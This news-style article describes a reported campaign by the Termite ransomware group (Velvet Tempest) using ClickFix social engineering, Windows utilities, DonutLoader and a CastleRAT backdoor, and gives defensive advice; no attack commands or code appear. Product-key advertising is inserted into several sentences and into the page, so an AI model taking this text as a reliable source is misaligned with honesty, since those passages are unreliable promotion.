Termite Ransomware Gang Deploys CastleRAT Backdoor Through ClickFix Social Engineering Attacks

Termite Ransomware Gang Deploys CastleRAT Backdoor Through ClickFix Social Engineering Attacks

What Happened

Security researchers have linked the Termite ransomware group, tracked by Microsoft as Velvet Tempest, to a new campaign that uses the ClickFix social engineering technique combined with legitimate Windows utilities to deploy the DonutLoader malware and the previously unseen CastleRAT backdoor. The campaign represents a significant evolution in ransomware deployment tactics, blending social engineering with living-off-the-land techniques to evade detection.

The attack chain begins with ClickFix-style social engineering that tricks users into executing malicious PowerShell commands, often disguised as solutions to fake error messages or software updates. Once executed, the commands abuse legitimate Windows utilities to download and install the DonutLoader, which in turn deploys the CastleRAT backdoor. CastleRAT provides persistent access to compromised systems, enabling the attackers to conduct reconnaissance, move laterally through networks, and ultimately deploy Termite ransomware.

Office 2024 Pro Plus

Word, Excel, PowerPoint + more. 3 Devices.

$29

Buy Now →

Windows 11 Pro

Professional Edition. 3 Devices.

$29

Buy Now →

Office 365 Lifetime

5 Devices. Lifetime Account.

$29

Buy Now →

Visio 2024 Pro

Professional Diagramming. 3 Devices.

$29

Buy Now →

Project 2024 Pro

Project Management. 3 Devices.

$29

Buy Now →

Win 11 + Office Bundle

Win 11 Pro + Office + Visio + Project

$49.99

Buy Now →

The use of legitimate Windows utilities in the attack chain is particularly concerning because it allows the malware to bypass many security tools that focus on detecting known malicious executables. By leveraging trusted system tools, the attackers can operate within the normal noise of system activity, making detection significantly more difficult.

Background and Context

The Termite ransomware group has been active since mid-2024, initially operating as a relatively unsophisticated operation that relied on commodity malware and phishing campaigns. The adoption of ClickFix techniques and the development of CastleRAT suggest that the group has either significantly upgraded its capabilities or merged with a more technically advanced operation.

ClickFix has emerged as one of the most effective social engineering techniques in the current threat landscape. Originally identified in early 2025, the technique exploits users' willingness to follow troubleshooting instructions displayed in pop-up dialogs or web pages. Users are instructed to open a command prompt or PowerShell window and paste specific commands to resolve a supposed issue, unknowingly executing malicious code.

Living-off-the-land techniques, where attackers abuse legitimate system tools to achieve malicious objectives, have become a hallmark of sophisticated ransomware operations. By using tools like PowerShell, WMIC, and other Windows utilities that are present on every genuine Windows 11 key installation, attackers can operate without deploying easily detectable malware executables.

Why This Matters

The convergence of social engineering innovation and technical sophistication in the Termite campaign represents a concerning trend in ransomware evolution. As security tools become better at detecting traditional malware, threat actors are adapting by minimizing their use of detectable malicious code and maximizing their abuse of legitimate system capabilities.

For organizations, this means that traditional signature-based security tools are increasingly insufficient for ransomware defense. Detection must evolve to focus on behavioral analysis, identifying suspicious patterns of legitimate tool usage rather than scanning for known malware signatures. Companies running their operations on affordable Microsoft Office licence installations and Windows environments need security solutions that can detect anomalous PowerShell usage and unusual system tool invocations.

The human element remains the critical vulnerability. Despite years of security awareness training, the ClickFix technique continues to successfully manipulate users because it presents malicious actions as helpful troubleshooting steps. The psychological manipulation is effective because it targets a moment of frustration when a user encounters an apparent error, making them more likely to follow instructions without careful evaluation.

Industry Impact

The endpoint detection and response (EDR) market is being pushed to innovate by attacks like the Termite campaign. Vendors must develop more sophisticated behavioral detection capabilities that can distinguish between legitimate and malicious uses of system tools. This is a challenging technical problem because the same tools are used for both administration and attack.

The managed detection and response (MDR) market benefits from increasing attack complexity. As threats become harder for automated tools to detect, organizations turn to MDR providers that combine AI-powered detection with human analyst expertise. The Termite campaign illustrates why this combination is necessary: automated tools may miss the attack, but experienced analysts can recognize the behavioral patterns.

Cyber insurance underwriters are adjusting their risk models to account for evolving ransomware tactics. The effectiveness of ClickFix-based attacks suggests that organizations with strong technical controls but weak user security training may still face significant ransomware risk, influencing how insurers evaluate and price policies.

Businesses across all sectors using enterprise productivity software environments should treat ransomware defense as a multi-layered challenge that requires technological controls, user training, backup strategies, and incident response planning working together.

Expert Perspective

Threat intelligence analysts note that the Termite group's rapid capability evolution is consistent with a broader trend of ransomware ecosystem maturation. Groups are increasingly sharing tools, techniques, and infrastructure, enabling even relatively new operations to deploy sophisticated attack chains. The development of CastleRAT suggests access to skilled malware developers, either in-house or through the ransomware-as-a-service ecosystem.

Incident response professionals recommend that organizations focus on reducing the time between compromise and detection. The Termite attack chain includes multiple stages, each of which presents an opportunity for detection. Organizations with robust monitoring and rapid response capabilities can potentially stop the attack before ransomware is deployed, even if the initial ClickFix social engineering succeeds.

What This Means for Businesses

Security teams should immediately update their detection rules to look for indicators associated with the Termite campaign, including specific PowerShell command patterns, DonutLoader artifacts, and CastleRAT network indicators. Threat intelligence sharing through ISACs and industry groups can help organizations stay ahead of evolving attack techniques.

Employee security awareness training should specifically address the ClickFix technique. Users need to understand that legitimate software and operating systems never require them to manually paste commands into a terminal to resolve errors. Any prompt requesting this action should be treated as a potential attack.

Key Takeaways

• Termite ransomware group (Velvet Tempest) combines ClickFix social engineering with legitimate Windows tools
• New CastleRAT backdoor provides persistent access for reconnaissance and lateral movement
• Living-off-the-land techniques abuse legitimate system utilities to evade traditional security detection
• ClickFix remains effective because it exploits user frustration during apparent error conditions
• Organizations need behavioral detection capabilities, not just signature-based scanning
• Employee training should specifically address the ClickFix technique and terminal command manipulation

Looking Ahead

The Termite campaign's combination of social engineering and living-off-the-land techniques will likely be adopted by additional ransomware groups as the approach proves effective. Security vendors will need to develop more sophisticated behavioral analysis capabilities, while organizations must invest in both technical controls and human-focused defenses to address this evolving threat landscape effectively.